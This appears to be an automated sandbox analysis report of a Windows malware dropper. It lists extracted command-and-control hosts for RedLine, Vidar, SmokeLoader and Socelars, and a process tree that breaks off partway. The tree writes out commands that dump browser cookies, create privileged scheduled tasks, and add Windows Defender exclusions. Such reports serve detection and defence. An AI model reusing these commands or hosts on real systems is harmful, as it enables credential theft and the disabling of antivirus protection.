Analysis

  • max time kernel
    158s
  • max time network
    168s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220310-en
  • submitted
    14-03-2022 12:14

General

  • Target

    ca7e4f979addfa21316fae808c24a63e171a3f7d2f9b9cb2faa6011f7e82fbd3.exe

  • Size

    3.5MB

  • MD5

    291d444cc422f4671db55fc354f27574

  • SHA1

    ee53088b389e2944bb25dc6ebf35bfac23697801

  • SHA256

    ca7e4f979addfa21316fae808c24a63e171a3f7d2f9b9cb2faa6011f7e82fbd3

  • SHA512

    8100bba4d374f15108091425b2caf9a6b4826032ffa71eb7e5cfa2f9ffb696f2fa4b264b6bbf50f252567a44707fb95c0b98be2cefa533773102c2dd210476c1

Malware Config

Extracted

Family

socelars

C2

http://www.iyiqian.com/

http://www.xxhufdc.top/

http://www.uefhkice.xyz/

http://www.fcektsy.top/

Extracted

Family

vidar

Version

39.9

Botnet

706

C2

https://prophefliloc.tumblr.com/

Attributes
  • profile_id

    706

Extracted

Family

redline

Botnet

AniOLD

C2

liezaphare.xyz:80

Extracted

Family

smokeloader

Version

2020

C2

http://aucmoney.com/upload/

http://thegymmum.com/upload/

http://atvcampingtrips.com/upload/

http://kuapakualaman.com/upload/

http://renatazarazua.com/upload/

http://nasufmutlu.com/upload/

rc4.i32
rc4.i32

Extracted

Family

redline

Botnet

redline

C2

193.106.191.253:4752

Attributes
  • auth_value

    c6b533a917f5c6a3e6d1afd9c29f81c6

Extracted

Family

redline

C2

185.11.73.22:45202

5.206.224.220:81

Attributes
  • auth_value

    4811a2f23005637a45b22c416ef83c5f

Extracted

Family

vidar

Version

50.7

Botnet

1177

C2

https://ruhr.social/@sam9al

https://koyu.space/@samsa2l

Attributes
  • profile_id

    1177

Extracted

Family

redline

Botnet

ruz876

C2

185.215.113.7:5186

Attributes
  • auth_value

    4750f6742a496bbe74a981d51e7680ad

Signatures

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • OnlyLogger

    A tiny loader that uses IPLogger to get its payload.

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 15 IoCs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Socelars

    Socelars is an infostealer targeting browser cookies and credit card credentials.

  • Socelars Payload 2 IoCs
  • Tofsee

    Backdoor/botnet which carries out malicious activities based on commands from a C2 server.

  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • suricata: ET MALWARE EXE Download Request To Wordpress Folder Likely Malicious

    suricata: ET MALWARE EXE Download Request To Wordpress Folder Likely Malicious

  • suricata: ET MALWARE GCleaner Downloader Activity M5

    suricata: ET MALWARE GCleaner Downloader Activity M5

  • suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile

    suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile

  • suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload

    suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload

  • suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer HTTP POST Pattern

    suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer HTTP POST Pattern

  • suricata: ET MALWARE Win32/Spy.Socelars.S CnC Activity M3

    suricata: ET MALWARE Win32/Spy.Socelars.S CnC Activity M3

  • suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin M2

    suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin M2

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
  • OnlyLogger Payload 1 IoCs
  • Vidar Stealer 3 IoCs
  • ASPack v2.12-2.42 9 IoCs

    Detects executables packed with ASPack v2.12-2.42

  • Creates new service(s) 1 TTPs
  • Downloads MZ/PE file
  • Executes dropped EXE 44 IoCs
  • Modifies Windows Firewall 1 TTPs
  • UPX packed file 9 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Checks BIOS information in registry 2 TTPs 14 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 4 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 8 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Checks whether UAC is enabled 1 TTPs 6 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 6 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Looks up geolocation information via web service

    Uses a legitimate geolocation service to find the infected system's geolocation info.

  • Suspicious use of NtSetInformationThreadHideFromDebugger 3 IoCs
  • Suspicious use of SetThreadContext 4 IoCs
  • Drops file in Program Files directory 2 IoCs
  • Launches sc.exe

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 20 IoCs
  • Checks SCSI registry key(s) 3 TTPs 3 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 3 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Delays execution with timeout.exe 4 IoCs
  • Kills process with taskkill 4 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 62 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\ca7e4f979addfa21316fae808c24a63e171a3f7d2f9b9cb2faa6011f7e82fbd3.exe
    "C:\Users\Admin\AppData\Local\Temp\ca7e4f979addfa21316fae808c24a63e171a3f7d2f9b9cb2faa6011f7e82fbd3.exe"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:1076
    • C:\Users\Admin\AppData\Local\Temp\7zS434544AD\setup_install.exe
      "C:\Users\Admin\AppData\Local\Temp\7zS434544AD\setup_install.exe"
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:1720
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c sahiba_1.exe
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2304
        • C:\Users\Admin\AppData\Local\Temp\7zS434544AD\sahiba_1.exe
          sahiba_1.exe
          4⤵
          • Executes dropped EXE
          • Checks computer location settings
          PID:3808
          • C:\Users\Admin\AppData\Local\Temp\7zS434544AD\sahiba_1.exe
            "C:\Users\Admin\AppData\Local\Temp\7zS434544AD\sahiba_1.exe" -a
            5⤵
            • Executes dropped EXE
            PID:1144
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c sahiba_2.exe
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4348
        • C:\Users\Admin\AppData\Local\Temp\7zS434544AD\sahiba_2.exe
          sahiba_2.exe
          4⤵
          • Executes dropped EXE
          • Checks SCSI registry key(s)
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious behavior: MapViewOfSection
          PID:2120
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c sahiba_3.exe
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2912
        • C:\Users\Admin\AppData\Local\Temp\7zS434544AD\sahiba_3.exe
          sahiba_3.exe
          4⤵
          • Executes dropped EXE
          • Modifies system certificate store
          PID:5104
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c sahiba_10.exe
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4404
        • C:\Users\Admin\AppData\Local\Temp\7zS434544AD\sahiba_10.exe
          sahiba_10.exe
          4⤵
          • Executes dropped EXE
          • Suspicious use of AdjustPrivilegeToken
          PID:3752
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c sahiba_9.exe
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3948
        • C:\Users\Admin\AppData\Local\Temp\7zS434544AD\sahiba_9.exe
          sahiba_9.exe
          4⤵
          • Executes dropped EXE
          PID:3768
          • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
            C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
            5⤵
            • Executes dropped EXE
            PID:2276
          • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
            C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /DeleteCookiesWildcard "*.facebook.com"
            5⤵
            • Executes dropped EXE
            PID:3320
          • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
            C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
            5⤵
            • Executes dropped EXE
            PID:1968
          • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
            C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /DeleteCookiesWildcard "*.facebook.com"
            5⤵
            • Executes dropped EXE
            PID:2364
          • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
            C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
            5⤵
            • Executes dropped EXE
            PID:4412
          • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
            C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /DeleteCookiesWildcard "*.facebook.com"
            5⤵
            • Executes dropped EXE
            PID:396
          • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
            C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
            5⤵
            • Executes dropped EXE
            PID:3580
          • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
            C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /DeleteCookiesWildcard "*.facebook.com"
            5⤵
            • Executes dropped EXE
            PID:4848
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c sahiba_8.exe
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3084
        • C:\Users\Admin\AppData\Local\Temp\7zS434544AD\sahiba_8.exe
          sahiba_8.exe
          4⤵
          • Executes dropped EXE
          • Suspicious use of AdjustPrivilegeToken
          PID:3692
          • C:\Windows\SysWOW64\cmd.exe
            cmd.exe /c taskkill /f /im chrome.exe
            5⤵
              PID:3124
              • C:\Windows\SysWOW64\taskkill.exe
                taskkill /f /im chrome.exe
                6⤵
                • Kills process with taskkill
                • Suspicious use of AdjustPrivilegeToken
                PID:3000
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c sahiba_7.exe
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:3844
          • C:\Users\Admin\AppData\Local\Temp\7zS434544AD\sahiba_7.exe
            sahiba_7.exe
            4⤵
            • Executes dropped EXE
            • Checks computer location settings
            PID:3756
            • C:\Users\Admin\Documents\tTzS7INef8bs_8VpDvVCJCV0.exe
              "C:\Users\Admin\Documents\tTzS7INef8bs_8VpDvVCJCV0.exe"
              5⤵
              • Executes dropped EXE
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • Suspicious use of AdjustPrivilegeToken
              PID:3600
            • C:\Users\Admin\Documents\OzMiCADNI6xO0UMdfJ2ij6XA.exe
              "C:\Users\Admin\Documents\OzMiCADNI6xO0UMdfJ2ij6XA.exe"
              5⤵
              • Executes dropped EXE
              • Drops file in Program Files directory
              PID:2132
              • C:\Users\Admin\Documents\pTw6IBrd1EMRJeWLT9No0VM6.exe
                "C:\Users\Admin\Documents\pTw6IBrd1EMRJeWLT9No0VM6.exe"
                6⤵
                  PID:3064
                  • C:\Users\Admin\Pictures\Adobe Films\dYYbDtS_MtZbgmHD8VEcJwx0.exe
                    "C:\Users\Admin\Pictures\Adobe Films\dYYbDtS_MtZbgmHD8VEcJwx0.exe"
                    7⤵
                      PID:1960
                    • C:\Users\Admin\Pictures\Adobe Films\MbxMwSZOytKgBVJoBjSk2k4I.exe
                      "C:\Users\Admin\Pictures\Adobe Films\MbxMwSZOytKgBVJoBjSk2k4I.exe"
                      7⤵
                        PID:1628
                        • C:\Windows\SysWOW64\WerFault.exe
                          C:\Windows\SysWOW64\WerFault.exe -u -p 1628 -s 616
                          8⤵
                          • Program crash
                          PID:1260
                        • C:\Windows\SysWOW64\WerFault.exe
                          C:\Windows\SysWOW64\WerFault.exe -u -p 1628 -s 652
                          8⤵
                          • Program crash
                          PID:5800
                        • C:\Windows\SysWOW64\WerFault.exe
                          C:\Windows\SysWOW64\WerFault.exe -u -p 1628 -s 636
                          8⤵
                          • Program crash
                          PID:5852
                        • C:\Windows\SysWOW64\WerFault.exe
                          C:\Windows\SysWOW64\WerFault.exe -u -p 1628 -s 648
                          8⤵
                          • Program crash
                          PID:5652
                      • C:\Users\Admin\Pictures\Adobe Films\R0xQniVDNBlP3qggBMY5gzsO.exe
                        "C:\Users\Admin\Pictures\Adobe Films\R0xQniVDNBlP3qggBMY5gzsO.exe"
                        7⤵
                          PID:4672
                          • C:\Windows\SysWOW64\control.exe
                            "C:\Windows\System32\control.exe" .\a6U_WGm.9B
                            8⤵
                              PID:3756
                              • C:\Windows\SysWOW64\rundll32.exe
                                "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL .\a6U_WGm.9B
                                9⤵
                                  PID:5284
                            • C:\Users\Admin\Pictures\Adobe Films\o7ROHmbEAfsE3PvPuANDiJzS.exe
                              "C:\Users\Admin\Pictures\Adobe Films\o7ROHmbEAfsE3PvPuANDiJzS.exe"
                              7⤵
                                PID:2160
                                • C:\Users\Admin\AppData\Local\Temp\7zS8C26.tmp\Install.exe
                                  .\Install.exe
                                  8⤵
                                    PID:3740
                                    • C:\Users\Admin\AppData\Local\Temp\7zSA76F.tmp\Install.exe
                                      .\Install.exe /S /site_id "525403"
                                      9⤵
                                        PID:5228
                                  • C:\Users\Admin\Pictures\Adobe Films\A5B1eDaNBtwEcua9SnlLeWjl.exe
                                    "C:\Users\Admin\Pictures\Adobe Films\A5B1eDaNBtwEcua9SnlLeWjl.exe"
                                    7⤵
                                      PID:4176
                                    • C:\Users\Admin\Pictures\Adobe Films\tHo0JL9i7uaYKLGnePA8at_x.exe
                                      "C:\Users\Admin\Pictures\Adobe Films\tHo0JL9i7uaYKLGnePA8at_x.exe"
                                      7⤵
                                        PID:1032
                                        • C:\Windows\system32\WerFault.exe
                                          C:\Windows\system32\WerFault.exe -u -p 1032 -s 856
                                          8⤵
                                          • Program crash
                                          PID:1108
                                      • C:\Users\Admin\Pictures\Adobe Films\XrT5Z84_t8AFV_GfnIFHPdK8.exe
                                        "C:\Users\Admin\Pictures\Adobe Films\XrT5Z84_t8AFV_GfnIFHPdK8.exe"
                                        7⤵
                                          PID:2956
                                          • C:\Users\Admin\AppData\Local\Temp\TrdngAnlzr1649.exe
                                            "C:\Users\Admin\AppData\Local\Temp\TrdngAnlzr1649.exe"
                                            8⤵
                                              PID:5424
                                              • C:\Users\Admin\AppData\Local\Temp\F36EF.exe
                                                "C:\Users\Admin\AppData\Local\Temp\F36EF.exe"
                                                9⤵
                                                  PID:5712
                                                • C:\Users\Admin\AppData\Local\Temp\F36EF.exe
                                                  "C:\Users\Admin\AppData\Local\Temp\F36EF.exe"
                                                  9⤵
                                                    PID:5980
                                                  • C:\Users\Admin\AppData\Local\Temp\H4KM5.exe
                                                    "C:\Users\Admin\AppData\Local\Temp\H4KM5.exe"
                                                    9⤵
                                                      PID:5872
                                                      • C:\Windows\SysWOW64\control.exe
                                                        "C:\Windows\System32\control.exe" .\HSCN.H
                                                        10⤵
                                                          PID:5732
                                                          • C:\Windows\SysWOW64\rundll32.exe
                                                            "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL .\HSCN.H
                                                            11⤵
                                                              PID:4908
                                                        • C:\Users\Admin\AppData\Local\Temp\46B6B158EJ8BH08.exe
                                                          https://iplogger.org/1QuEf7
                                                          9⤵
                                                            PID:5464
                                                        • C:\Users\Admin\AppData\Local\Temp\xli.exe
                                                          "C:\Users\Admin\AppData\Local\Temp\xli.exe"
                                                          8⤵
                                                            PID:5608
                                                            • C:\Users\Admin\AppData\Local\Temp\xli.exe
                                                              "C:\Users\Admin\AppData\Local\Temp\xli.exe" -h
                                                              9⤵
                                                                PID:6008
                                                            • C:\Users\Admin\AppData\Local\Temp\InsigniaCleanerInstall238497.exe
                                                              "C:\Users\Admin\AppData\Local\Temp\InsigniaCleanerInstall238497.exe"
                                                              8⤵
                                                                PID:5752
                                                                • C:\Users\Admin\AppData\Local\Temp\afd6f105-66b7-4a72-a2c3-ef3e8800f905.exe
                                                                  "C:\Users\Admin\AppData\Local\Temp\afd6f105-66b7-4a72-a2c3-ef3e8800f905.exe"
                                                                  9⤵
                                                                    PID:6000
                                                                • C:\Users\Admin\AppData\Local\Temp\po50.exe
                                                                  "C:\Users\Admin\AppData\Local\Temp\po50.exe"
                                                                  8⤵
                                                                    PID:6052
                                                                  • C:\Users\Admin\AppData\Local\Temp\siww1049.exe
                                                                    "C:\Users\Admin\AppData\Local\Temp\siww1049.exe"
                                                                    8⤵
                                                                      PID:5584
                                                                      • C:\Windows\system32\WerFault.exe
                                                                        C:\Windows\system32\WerFault.exe -u -p 5584 -s 284
                                                                        9⤵
                                                                        • Program crash
                                                                        PID:816
                                                                    • C:\Users\Admin\AppData\Local\Temp\pub1.exe
                                                                      "C:\Users\Admin\AppData\Local\Temp\pub1.exe"
                                                                      8⤵
                                                                        PID:5780
                                                                        • C:\Windows\system32\cmd.exe
                                                                          C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\9jzrhsu4.pl1.bat""
                                                                          9⤵
                                                                            PID:1644
                                                                            • C:\Windows\system32\timeout.exe
                                                                              timeout 3
                                                                              10⤵
                                                                              • Delays execution with timeout.exe
                                                                              PID:6096
                                                                        • C:\Users\Admin\AppData\Local\Temp\jg7_7wjg.exe
                                                                          "C:\Users\Admin\AppData\Local\Temp\jg7_7wjg.exe"
                                                                          8⤵
                                                                            PID:2088
                                                                          • C:\Users\Admin\AppData\Local\Temp\setup.exe
                                                                            "C:\Users\Admin\AppData\Local\Temp\setup.exe"
                                                                            8⤵
                                                                              PID:4732
                                                                              • C:\Users\Admin\AppData\Local\Temp\is-T8HFF.tmp\setup.tmp
                                                                                "C:\Users\Admin\AppData\Local\Temp\is-T8HFF.tmp\setup.tmp" /SL5="$402C2,870458,780800,C:\Users\Admin\AppData\Local\Temp\setup.exe"
                                                                                9⤵
                                                                                  PID:5064
                                                                              • C:\Users\Admin\AppData\Local\Temp\inst200.exe
                                                                                "C:\Users\Admin\AppData\Local\Temp\inst200.exe"
                                                                                8⤵
                                                                                  PID:4572
                                                                                • C:\Users\Admin\AppData\Local\Temp\ip.exe
                                                                                  "C:\Users\Admin\AppData\Local\Temp\ip.exe"
                                                                                  8⤵
                                                                                    PID:4776
                                                                                  • C:\Users\Admin\AppData\Local\Temp\udontsay.exe
                                                                                    "C:\Users\Admin\AppData\Local\Temp\udontsay.exe"
                                                                                    8⤵
                                                                                      PID:1056
                                                                                    • C:\Users\Admin\AppData\Local\Temp\Routes Installation.exe
                                                                                      "C:\Users\Admin\AppData\Local\Temp\Routes Installation.exe"
                                                                                      8⤵
                                                                                        PID:5728
                                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                                    schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST
                                                                                    6⤵
                                                                                    • Creates scheduled task(s)
                                                                                    PID:3804
                                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                                    schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST
                                                                                    6⤵
                                                                                    • Creates scheduled task(s)
                                                                                    PID:1484
                                                                                • C:\Users\Admin\Documents\pvkadCmgujW6sgz7CQycaJz9.exe
                                                                                  "C:\Users\Admin\Documents\pvkadCmgujW6sgz7CQycaJz9.exe"
                                                                                  5⤵
                                                                                  • Executes dropped EXE
                                                                                  • Checks BIOS information in registry
                                                                                  • Checks whether UAC is enabled
                                                                                  • Suspicious use of SetThreadContext
                                                                                  PID:1880
                                                                                  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                                                                                    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
                                                                                    6⤵
                                                                                      PID:1552
                                                                                  • C:\Users\Admin\Documents\vvU7ddScH2AmxBjoH2eg68na.exe
                                                                                    "C:\Users\Admin\Documents\vvU7ddScH2AmxBjoH2eg68na.exe"
                                                                                    5⤵
                                                                                    • Executes dropped EXE
                                                                                    • Checks BIOS information in registry
                                                                                    • Checks whether UAC is enabled
                                                                                    • Suspicious use of SetThreadContext
                                                                                    PID:3612
                                                                                    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                                                                                      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
                                                                                      6⤵
                                                                                        PID:476
                                                                                    • C:\Users\Admin\Documents\C7vOD0x6NZ67phGPzNAgAnqQ.exe
                                                                                      "C:\Users\Admin\Documents\C7vOD0x6NZ67phGPzNAgAnqQ.exe"
                                                                                      5⤵
                                                                                      • Executes dropped EXE
                                                                                      • Checks BIOS information in registry
                                                                                      • Checks whether UAC is enabled
                                                                                      • Suspicious use of SetThreadContext
                                                                                      PID:4148
                                                                                      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                                                                                        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
                                                                                        6⤵
                                                                                          PID:4412
                                                                                      • C:\Users\Admin\Documents\rG6WU3TwxgmZjD2NjHJNqFbE.exe
                                                                                        "C:\Users\Admin\Documents\rG6WU3TwxgmZjD2NjHJNqFbE.exe"
                                                                                        5⤵
                                                                                        • Executes dropped EXE
                                                                                        • Checks computer location settings
                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                        PID:4308
                                                                                        • C:\Users\Admin\AppData\Local\Temp\38344876-54a8-4775-aa53-4f953173a29d.exe
                                                                                          "C:\Users\Admin\AppData\Local\Temp\38344876-54a8-4775-aa53-4f953173a29d.exe"
                                                                                          6⤵
                                                                                            PID:3576
                                                                                        • C:\Users\Admin\Documents\wRXO8zXiXvFSNr0_8yH5BM2N.exe
                                                                                          "C:\Users\Admin\Documents\wRXO8zXiXvFSNr0_8yH5BM2N.exe"
                                                                                          5⤵
                                                                                          • Executes dropped EXE
                                                                                          PID:3892
                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 3892 -s 624
                                                                                            6⤵
                                                                                            • Program crash
                                                                                            PID:2608
                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 3892 -s 632
                                                                                            6⤵
                                                                                            • Program crash
                                                                                            PID:1820
                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 3892 -s 668
                                                                                            6⤵
                                                                                            • Program crash
                                                                                            PID:4256
                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 3892 -s 816
                                                                                            6⤵
                                                                                            • Program crash
                                                                                            PID:3456
                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 3892 -s 776
                                                                                            6⤵
                                                                                            • Program crash
                                                                                            PID:1748
                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 3892 -s 1272
                                                                                            6⤵
                                                                                            • Program crash
                                                                                            PID:2528
                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 3892 -s 1304
                                                                                            6⤵
                                                                                            • Program crash
                                                                                            PID:5536
                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                            "C:\Windows\System32\cmd.exe" /c taskkill /im "wRXO8zXiXvFSNr0_8yH5BM2N.exe" /f & erase "C:\Users\Admin\Documents\wRXO8zXiXvFSNr0_8yH5BM2N.exe" & exit
                                                                                            6⤵
                                                                                              PID:5340
                                                                                              • C:\Windows\SysWOW64\taskkill.exe
                                                                                                taskkill /im "wRXO8zXiXvFSNr0_8yH5BM2N.exe" /f
                                                                                                7⤵
                                                                                                • Kills process with taskkill
                                                                                                PID:1760
                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 3892 -s 1352
                                                                                              6⤵
                                                                                              • Program crash
                                                                                              PID:1176
                                                                                          • C:\Users\Admin\Documents\Y1ctAmiudPt0ZyDzD_FJFtPK.exe
                                                                                            "C:\Users\Admin\Documents\Y1ctAmiudPt0ZyDzD_FJFtPK.exe"
                                                                                            5⤵
                                                                                            • Executes dropped EXE
                                                                                            PID:5032
                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 5032 -s 440
                                                                                              6⤵
                                                                                              • Program crash
                                                                                              PID:1284
                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 5032 -s 448
                                                                                              6⤵
                                                                                              • Program crash
                                                                                              PID:1944
                                                                                          • C:\Users\Admin\Documents\9E0Q7CMreiRzs9VsS96zXj1d.exe
                                                                                            "C:\Users\Admin\Documents\9E0Q7CMreiRzs9VsS96zXj1d.exe"
                                                                                            5⤵
                                                                                              PID:1920
                                                                                              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                                                                                                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
                                                                                                6⤵
                                                                                                  PID:1832
                                                                                              • C:\Users\Admin\Documents\LENxxenZZSp1tGL2nF_PZEGi.exe
                                                                                                "C:\Users\Admin\Documents\LENxxenZZSp1tGL2nF_PZEGi.exe"
                                                                                                5⤵
                                                                                                • Executes dropped EXE
                                                                                                PID:3628
                                                                                                • C:\Users\Admin\AppData\Local\Temp\7zSE836.tmp\Install.exe
                                                                                                  .\Install.exe
                                                                                                  6⤵
                                                                                                  • Executes dropped EXE
                                                                                                  PID:4136
                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zS63D.tmp\Install.exe
                                                                                                    .\Install.exe /S /site_id "525403"
                                                                                                    7⤵
                                                                                                    • Executes dropped EXE
                                                                                                    PID:3560
                                                                                                    • C:\Windows\SysWOW64\forfiles.exe
                                                                                                      "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
                                                                                                      8⤵
                                                                                                        PID:4348
                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                          /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
                                                                                                          9⤵
                                                                                                            PID:3268
                                                                                                            • \??\c:\windows\SysWOW64\reg.exe
                                                                                                              REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
                                                                                                              10⤵
                                                                                                                PID:5872
                                                                                                              • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
                                                                                                                10⤵
                                                                                                                  PID:3608
                                                                                                            • C:\Windows\SysWOW64\forfiles.exe
                                                                                                              "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
                                                                                                              8⤵
                                                                                                                PID:5044
                                                                                                                • C:\Windows\SysWOW64\cmd.exe
